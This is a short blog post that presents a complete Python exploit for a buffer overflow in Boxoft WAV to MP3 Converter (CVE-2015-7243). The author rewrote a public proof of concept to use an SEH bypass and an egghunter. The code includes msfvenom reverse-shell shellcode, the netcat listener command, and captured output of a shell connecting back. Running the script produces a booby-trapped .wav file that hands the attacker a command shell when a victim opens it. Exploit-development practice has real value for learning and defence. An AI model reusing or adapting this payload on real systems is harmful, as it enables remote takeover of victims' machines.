I was looking for a vulnerable application to practice SEH Bypass and Egg Hunting techniques. I found this exploit on Exploit-DB which exploits a local buffer overflow vulnerability in Boxoft WAV to MP3 Converter.
This exploit does nothing much but pops up a message box on the target machine. I decided to modify it for reverse shell using SEH bypass and Egg Hunting as there was not much space left for the shellcode.
Here is the final exploit code:
#!/usr/bin/python #-------------------------------------------------------------------------------# # Exploit: Boxoft WAV to MP3 Converter - 'convert' SEH Overflow (Egghunter) # # Exploit Author: [SlidingWindow] , Twitter: @Kapil_Khot # # Vulnerability Credit: Robbie Corley, c0d3rc0rl3y@gmail.com # # https://www.exploit-db.com/exploits/38035/ # # CVE: CVE-2015-7243 # # OS: Windows 7 SP1 32-bit, Windows XP PRO SP3 # # Software: https://www.exploit-db.com/apps/ # # aa51b473d5c39ae015bcacb24c6c45e5-setup_free-wav-to-mp3_.exe # #-------------------------------------------------------------------------------# # The original exploit pops up a MessageBox. Modified it for reverse shell # # using SEH bypass + Egg Hunter # # Thanks to B33f@FuzzySecurity for awesome tutorial on Egg Hunting # # http://www.fuzzysecurity.com/tutorials/expDev/4.html # #-------------------------------------------------------------------------------# #root@kali:~/Desktop# nc -nvlp 443 # #listening on [any] 443 ... # #connect to [192.168.253.130] from (UNKNOWN) [192.168.253.128] 49405 # #Microsoft Windows [Version 6.1.7601] # #Copyright (c) 2009 Microsoft Corporation. All rights reserved. # # # #C:\Users\IEUser\Desktop>whoami # #whoami # #ie11win7\ieuser # # # #C:\Users\IEUser\Desktop> # # # #-------------------------------------------------------------------------------# filename = "exploitEgg.wav" nseh = "\xeb\x09\x90\x90" #JMP 09 bytes over SEH to egg hunting routine instead of next SEH record seh = "\xd3\x24\x40\x00" #0x004024d3 POP ECX POP EBP RET #Egghunter #Size 32-bytes #tag = l00t hunter = ( "\x66\x81\xca\xff" "\x0f\x42\x52\x6a" "\x02\x58\xcd\x2e" "\x3c\x05\x5a\x74" "\xef\xb8\x6c\x30" #l0 "\x30\x74\x8b\xfa" #0t "\xaf\x75\xea\xaf" "\x75\xe7\xff\xe7") #msfvenom -p windows/shell_reverse_tcp LHOST=192.168.253.130 LPORT=443 -f c -b '\x00\x0a\x0d\x1a' EXITFUNC=thread #x86/shikata_ga_nai succeeded with size 351 (iteration=0) #x86/shikata_ga_nai chosen with final size 351 #Payload size: 351 bytes shellcode =( "\xbd\x96\x49\x9e\x43\xdb\xdd\xd9\x74\x24\xf4\x58\x2b\xc9\xb1" "\x52\x31\x68\x12\x83\xc0\x04\x03\xfe\x47\x7c\xb6\x02\xbf\x02" "\x39\xfa\x40\x63\xb3\x1f\x71\xa3\xa7\x54\x22\x13\xa3\x38\xcf" "\xd8\xe1\xa8\x44\xac\x2d\xdf\xed\x1b\x08\xee\xee\x30\x68\x71" "\x6d\x4b\xbd\x51\x4c\x84\xb0\x90\x89\xf9\x39\xc0\x42\x75\xef" "\xf4\xe7\xc3\x2c\x7f\xbb\xc2\x34\x9c\x0c\xe4\x15\x33\x06\xbf" "\xb5\xb2\xcb\xcb\xff\xac\x08\xf1\xb6\x47\xfa\x8d\x48\x81\x32" "\x6d\xe6\xec\xfa\x9c\xf6\x29\x3c\x7f\x8d\x43\x3e\x02\x96\x90" "\x3c\xd8\x13\x02\xe6\xab\x84\xee\x16\x7f\x52\x65\x14\x34\x10" "\x21\x39\xcb\xf5\x5a\x45\x40\xf8\x8c\xcf\x12\xdf\x08\x8b\xc1" "\x7e\x09\x71\xa7\x7f\x49\xda\x18\xda\x02\xf7\x4d\x57\x49\x90" "\xa2\x5a\x71\x60\xad\xed\x02\x52\x72\x46\x8c\xde\xfb\x40\x4b" "\x20\xd6\x35\xc3\xdf\xd9\x45\xca\x1b\x8d\x15\x64\x8d\xae\xfd" "\x74\x32\x7b\x51\x24\x9c\xd4\x12\x94\x5c\x85\xfa\xfe\x52\xfa" "\x1b\x01\xb9\x93\xb6\xf8\x2a\x5c\xee\xff\x29\x34\xed\xff\x2c" "\x7e\x78\x19\x44\x90\x2d\xb2\xf1\x09\x74\x48\x63\xd5\xa2\x35" "\xa3\x5d\x41\xca\x6a\x96\x2c\xd8\x1b\x56\x7b\x82\x8a\x69\x51" "\xaa\x51\xfb\x3e\x2a\x1f\xe0\xe8\x7d\x48\xd6\xe0\xeb\x64\x41" "\x5b\x09\x75\x17\xa4\x89\xa2\xe4\x2b\x10\x26\x50\x08\x02\xfe" "\x59\x14\x76\xae\x0f\xc2\x20\x08\xe6\xa4\x9a\xc2\x55\x6f\x4a" "\x92\x95\xb0\x0c\x9b\xf3\x46\xf0\x2a\xaa\x1e\x0f\x82\x3a\x97" "\x68\xfe\xda\x58\xa3\xba\xfb\xba\x61\xb7\x93\x62\xe0\x7a\xfe" "\x94\xdf\xb9\x07\x17\xd5\x41\xfc\x07\x9c\x44\xb8\x8f\x4d\x35" "\xd1\x65\x71\xea\xd2\xaf") #-------------------------------------------------------------------------------# # badchars: \x00\x0a\x0d\x1a # #-------------------------------------------------------------------------------# # # # (1) SEH: 0x004024d3 : pop ecx # pop ebp # ret | wavtomp3.exe # # (2) nSEH: JMP 09 bytes over to nopsled => \xEB\x09\x90\x90 # # (3) Enough room for egghunter; marker "l00t" # #-------------------------------------------------------------------------------# egg = "l00tl00t" buffer = "A" * (4132 - len(shellcode) - len(egg) - 5 ) + egg + shellcode + "A" * 5 + nseh + seh + "\x90" * 20 + hunter + "B" * (5000 - 4132 - 20 - len(hunter)) file = open(filename,"w") file.write(buffer) file.close() #Open 'exploitEgg.wav' in the converter and boom!